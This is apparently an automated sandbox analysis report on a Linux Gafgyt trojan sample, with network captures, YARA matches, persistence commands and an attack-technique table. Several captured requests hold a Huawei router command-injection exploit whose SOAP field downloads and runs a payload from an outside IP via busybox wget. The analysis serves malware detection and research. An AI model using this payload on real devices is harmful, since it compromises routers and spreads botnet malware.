              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
              Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
              Source: unknownTCP traffic detected without corresponding DNS query: 96.126.75.168
              Source: unknownTCP traffic detected without corresponding DNS query: 135.29.85.160
              Source: unknownTCP traffic detected without corresponding DNS query: 157.165.157.167
              Source: unknownTCP traffic detected without corresponding DNS query: 197.218.72.255
              Source: unknownTCP traffic detected without corresponding DNS query: 41.111.232.41
              Source: unknownTCP traffic detected without corresponding DNS query: 180.215.178.223
              Source: unknownTCP traffic detected without corresponding DNS query: 197.95.212.145
              Source: unknownTCP traffic detected without corresponding DNS query: 157.139.208.17
              Source: unknownTCP traffic detected without corresponding DNS query: 197.166.32.51
              Source: unknownTCP traffic detected without corresponding DNS query: 157.50.201.94
              Source: unknownTCP traffic detected without corresponding DNS query: 38.214.124.88
              Source: unknownTCP traffic detected without corresponding DNS query: 197.207.197.234
              Source: unknownTCP traffic detected without corresponding DNS query: 97.188.19.223
              Source: unknownTCP traffic detected without corresponding DNS query: 47.173.204.30
              Source: unknownTCP traffic detected without corresponding DNS query: 197.111.253.197
              Source: unknownTCP traffic detected without corresponding DNS query: 41.116.217.181
              Source: unknownTCP traffic detected without corresponding DNS query: 197.201.40.22
              Source: unknownTCP traffic detected without corresponding DNS query: 197.156.89.127
              Source: unknownTCP traffic detected without corresponding DNS query: 41.163.203.95
              Source: unknownTCP traffic detected without corresponding DNS query: 180.16.78.227
              Source: unknownTCP traffic detected without corresponding DNS query: 197.142.183.154
              Source: unknownTCP traffic detected without corresponding DNS query: 157.201.23.58
              Source: unknownTCP traffic detected without corresponding DNS query: 157.124.5.18
              Source: unknownTCP traffic detected without corresponding DNS query: 197.205.217.145
              Source: unknownTCP traffic detected without corresponding DNS query: 197.24.45.221
              Source: unknownTCP traffic detected without corresponding DNS query: 41.145.240.122
              Source: unknownTCP traffic detected without corresponding DNS query: 157.157.101.174
              Source: unknownTCP traffic detected without corresponding DNS query: 197.11.97.13
              Source: unknownTCP traffic detected without corresponding DNS query: 109.189.48.21
              Source: unknownTCP traffic detected without corresponding DNS query: 41.114.172.204
              Source: unknownTCP traffic detected without corresponding DNS query: 201.161.74.244
              Source: unknownTCP traffic detected without corresponding DNS query: 41.122.69.72
              Source: unknownTCP traffic detected without corresponding DNS query: 157.123.180.115
              Source: unknownTCP traffic detected without corresponding DNS query: 36.47.88.65
              Source: unknownTCP traffic detected without corresponding DNS query: 41.128.254.123
              Source: unknownTCP traffic detected without corresponding DNS query: 157.95.27.19
              Source: unknownTCP traffic detected without corresponding DNS query: 197.21.137.84
              Source: unknownTCP traffic detected without corresponding DNS query: 157.82.218.221
              Source: unknownTCP traffic detected without corresponding DNS query: 197.236.249.120
              Source: unknownTCP traffic detected without corresponding DNS query: 157.161.177.81
              Source: unknownTCP traffic detected without corresponding DNS query: 197.236.123.21
              Source: unknownTCP traffic detected without corresponding DNS query: 157.12.198.165
              Source: unknownTCP traffic detected without corresponding DNS query: 197.225.81.170
              Source: unknownTCP traffic detected without corresponding DNS query: 157.94.171.198
              Source: unknownTCP traffic detected without corresponding DNS query: 157.156.120.144
              Source: unknownTCP traffic detected without corresponding DNS query: 2.45.60.100
              Source: unknownTCP traffic detected without corresponding DNS query: 197.108.69.86
              Source: unknownTCP traffic detected without corresponding DNS query: 157.227.88.248
              Source: 8oxYPvmeaT.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: 8oxYPvmeaT.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: unknownDNS traffic detected: queries for: BC@^]B

              System Summary

              barindex
              Source: 8oxYPvmeaT.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 6231.1.00007fa678400000.00007fa67840e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 6241.1.00007fa678400000.00007fa67840e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Process Memory Space: 8oxYPvmeaT.elf PID: 6231, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Process Memory Space: 8oxYPvmeaT.elf PID: 6241, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 8oxYPvmeaT.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 6231.1.00007fa678400000.00007fa67840e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 6241.1.00007fa678400000.00007fa67840e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: 8oxYPvmeaT.elf PID: 6231, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: 8oxYPvmeaT.elf PID: 6241, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: Initial sampleString containing 'busybox' found: /bin/busybox
              Source: Initial sampleString containing 'busybox' found: bin/busybox
              Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
              Source: Initial sampleString containing 'busybox' found: Content-Length: h/bin/busybox/bin/watchdog/bin/systemdbin/busyboxbin/watchdogbin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777 3f
              Source: classification engineClassification label: mal92.troj.linELF@0/0@105/0

              Persistence and Installation Behavior

              barindex
              Source: /bin/sh (PID: 6238)Chmod executable with 777: /usr/bin/chmod -> chmod 777 \\xffbin/systemd\\xfc\\xff8\\xfc\\xffd\\xfc\\xff\\x98\\x91@
              Source: /bin/sh (PID: 6236)Mkdir executable: /usr/bin/mkdir -> mkdir bin
              Source: /bin/sh (PID: 6238)Chmod executable: /usr/bin/chmod -> chmod 777 \\xffbin/systemd\\xfc\\xff8\\xfc\\xffd\\xfc\\xff\\x98\\x91@
              Source: /tmp/8oxYPvmeaT.elf (PID: 6233)Shell command executed: sh -c "rm -rf bin/systemd && mkdir bin; >bin/systemd && mv /tmp/8oxYPvmeaT.elf bin/systemd; chmod 777 \\xffbin/systemd\\xfc\\xff8\\xfc\\xffd\\xfc\\xff\\x98\\x91@"
              Source: /bin/sh (PID: 6235)Rm executable: /usr/bin/rm -> rm -rf bin/systemd
              Source: submitted sampleStderr: chmod: cannot access ''$'\377\177''bin/systemd'$'\177\030\374\377\177''8'$'\374\377\177''d'$'\374\377\177\230\221''@': No such file or directory: exit code = 0

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: unknownNetwork traffic detected: HTTP traffic on port 55800 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 55800
              Source: unknownNetwork traffic detected: HTTP traffic on port 46968 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 46968
              Source: unknownNetwork traffic detected: HTTP traffic on port 45106 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56078 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 56078
              Source: unknownNetwork traffic detected: HTTP traffic on port 34126 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 34126
              Source: /tmp/8oxYPvmeaT.elf (PID: 6231)Queries kernel information via 'uname':
              Source: 8oxYPvmeaT.elf, 6231.1.00007fff1d4cb000.00007fff1d4ec000.rw-.sdmp, 8oxYPvmeaT.elf, 6241.1.00007fff1d4cb000.00007fff1d4ec000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
              Source: 8oxYPvmeaT.elf, 6231.1.00005612601f0000.0000561260253000.rw-.sdmp, 8oxYPvmeaT.elf, 6241.1.00005612601f0000.0000561260253000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sh4
              Source: 8oxYPvmeaT.elf, 6231.1.00007fff1d4cb000.00007fff1d4ec000.rw-.sdmp, 8oxYPvmeaT.elf, 6241.1.00007fff1d4cb000.00007fff1d4ec000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-sh4/tmp/8oxYPvmeaT.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/8oxYPvmeaT.elf
              Source: 8oxYPvmeaT.elf, 6231.1.00005612601f0000.0000561260253000.rw-.sdmp, 8oxYPvmeaT.elf, 6241.1.00005612601f0000.0000561260253000.rw-.sdmpBinary or memory string: V5!/etc/qemu-binfmt/sh4

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 8oxYPvmeaT.elf, type: SAMPLE
              Source: Yara matchFile source: 6231.1.00007fa678400000.00007fa67840e000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6241.1.00007fa678400000.00007fa67840e000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 8oxYPvmeaT.elf, type: SAMPLE
              Source: Yara matchFile source: 6231.1.00007fa678400000.00007fa67840e000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6241.1.00007fa678400000.00007fa67840e000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 8oxYPvmeaT.elf PID: 6241, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 8oxYPvmeaT.elf, type: SAMPLE
              Source: Yara matchFile source: 6231.1.00007fa678400000.00007fa67840e000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6241.1.00007fa678400000.00007fa67840e000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 8oxYPvmeaT.elf, type: SAMPLE
              Source: Yara matchFile source: 6231.1.00007fa678400000.00007fa67840e000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6241.1.00007fa678400000.00007fa67840e000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 8oxYPvmeaT.elf PID: 6241, type: MEMORYSTR
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Scripting
              Path InterceptionPath Interception1
              File and Directory Permissions Modification
              OS Credential Dumping11
              Security Software Discovery
              Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
              Encrypted Channel
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Scripting
